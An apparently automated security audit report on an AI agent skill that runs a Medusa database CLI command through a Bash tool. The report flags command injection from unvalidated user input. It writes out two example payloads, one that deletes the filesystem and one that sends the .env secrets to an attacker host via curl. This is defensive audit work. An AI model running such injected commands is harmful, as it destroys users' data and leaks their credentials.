db-generate

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGH
PROMPT_INJECTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS
Full Analysis
  • PROMPT_INJECTION (HIGH): The skill allows for direct command injection by instructing the agent to place unvalidated user input (<module-name>) into a shell command template (npx medusa db:generate <module-name>). An attacker could provide a payload such as module; rm -rf / or module; curl http://attacker.com/$(cat .env) to execute arbitrary code or exfiltrate secrets.
  • COMMAND_EXECUTION (HIGH): The skill uses the Bash tool to run commands constructed at runtime using external data. This pattern is inherently dangerous without strict input filtering or the use of safe execution APIs that avoid shell interpolation.
  • EXTERNAL_DOWNLOADS (LOW): The skill relies on npx to execute the Medusa CLI. This may trigger downloads from the public npm registry. While Medusa is a reputable framework, the lack of version pinning or integrity checks for the environment is a minor risk factor.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Feb 17, 2026, 06:01 PM